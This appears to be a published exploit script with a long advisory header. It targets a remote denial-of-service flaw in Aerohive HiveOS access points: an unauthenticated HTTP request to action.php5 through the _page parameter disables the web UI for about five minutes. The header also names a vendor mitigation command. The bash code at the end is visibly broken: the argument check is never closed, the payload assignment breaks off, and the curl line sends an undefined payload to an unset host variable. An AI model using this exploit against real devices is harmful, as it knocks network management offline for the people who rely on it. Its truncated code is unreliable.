# Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit  
# Vendor: Extreme Networks  
# Product web page:  
# Datasheet:  
# Affected version: <=11.x  
# Summary: Aerohive HiveOS is the network operating system that powers  
# all Aerohive access points, based on a feature-rich Cooperative Control  
# architecture. HiveOS enables Aerohive devices to organize into groups,  
# or 'hives', which allows functionality like fast roaming, user-based  
# access control and fully stateful application-aware firewall policies,  
# as well as additional security and RF networking features - all without  
# the need for a centralized or dedicated controller.  
# Desc: An unauthenticated malicious user can trigger a Denial of Service  
# (DoS) attack when sending specific application layer packets towards the  
# Aerohive NetConfig UI. This PoC exploit renders the application unusable  
# for 305 seconds or 5 minutes with a single HTTP request using the action.php5  
# script calling the CliWindow function thru the _page parameter, denying  
# access to the web server hive user interface.  
# Vendor mitigation:  
# CLI> no system web-server hive-ui enable  
# Tested on: Hiawatha v9.6  
# Vulnerability discvered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
# Advisory ID: ZSL-2020-5566  
# Advisory URL:  
# 05.12.2019  
if [ "$#" -ne 1 ]; then  
echo -ne "\nUsage: $0 [ipaddr]\n\n"  
SBYTES=`echo -e \  
curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"